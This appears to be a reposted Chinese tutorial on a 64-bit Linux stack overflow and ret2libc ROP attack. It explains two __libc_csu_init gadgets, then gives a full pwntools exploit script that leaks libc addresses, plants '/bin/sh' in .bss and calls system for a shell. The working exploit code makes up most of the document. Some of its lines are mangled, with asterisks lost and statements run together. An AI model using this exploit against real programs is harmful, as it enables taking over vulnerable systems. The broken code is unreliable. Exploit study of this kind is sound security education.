64位linux系统：栈溢出+ret2libc ROP attack

64位linux系统：栈溢出+ret2libc ROP attack

配件1

4005f0: 4c 89 ea mov %R13,%RDX 4005f3: 4c 89 f6 mov %R14,%RSI 4005f6: 44 89 ff mov %R15d,%EDI 4005f9: 41 ff 14 dc callq *(%R12,%RBX,8) 4005fd: 48 83 c3 01 add $0x1,%RBX 400601: 48 39 eb cmp %RBP,%RBX 400604: 75 ea jne 4005f0 <__libc_csu_init+0x40>

利用配件1，如将RBX设置为0，R12可以控制，通过callq*(%R12,%RBX,8)就可以跳转到任意地址执行代码。之后将RBX寄存器内容加1后，判断如果RBP等于RBX，就会继续执行第一次的代码。为了让RBP和RBX的值相等，可以将RBP的值设置为1。

配件2

400606: 48 83 c4 08 add $0x8,%rsp 40060a: 5b pop %RBX 40060b: 5d pop %RBP 40060c: 41 5c pop %R12 40060e: 41 5d pop %R13 400610: 41 5e pop %R14 400612: 41 5f pop %R15 400614: c3 retq

附：

attack代码exp.py`#!/usr/bin/env python from pwn import *

elf = ELF('vul') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('./vul') got_write = elf.got['write'] print "got_write: " + hex(got_write) got_read = elf.got['read'] print "got_read: " + hex(got_read) off_system_addr = libc.symbols['write'] - libc.symbols['system'] print "off_system_addr: " + hex(off_system_addr)

main = 0x40057a

#rdi= edi = r13, rsi = r14, rdx = r15 #write(rdi=1, rsi=write.got, rdx=4) payload1 = "\x41"*136

#pop_junk_rbx_rbp_r12_r13_r14_r15_ret payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(8) + p64(got_write)+p64(1)#mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx8]payload1 += p64(0x4005f0)payload1 += "\x00"56 payload1 += p64(main)

p.recvuntil("Hello, World\n") print "\n#############sending payload1#############\n" p.send(payload1) sleep(1)

write_addr = u64(p.recv(8)) print "write_addr: " + hex(write_addr)

system_addr = write_addr - off_system_addr print "system_addr: " + hex(system_addr)

bss_addr=0x601040

p.recvuntil("Hello, World\n")

#####################payload2###########

#rdi= edi = r13, rsi = r14, rdx = r15 #read(rdi=0, rsi=bss_addr, rdx=16)

payload2 = "\x00"*136

payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0)

payload2 += p64(0x4005f0)

payload2 += "\x00"*56 payload2 += p64(main)

print "\n#############sending payload2#############\n" p.send(payload2) sleep(1)

p.send(p64(system_addr)) p.send("/bin/sh\0") sleep(1)

p.recvuntil("Hello, World\n")

#####################payload3###########

#rdi= edi = r13, rsi = r14, rdx = r15 #system(rdi = bss_addr+8 = "/bin/sh")

payload3 = "\x00"*136

payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8)

payload3 += p64(0x4005f0)

payload3 += "\x00"*56 payload3 += p64(main)

print "\n#############sending payload3#############\n" sleep(1) p.send(payload3)

p.interactive() `

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。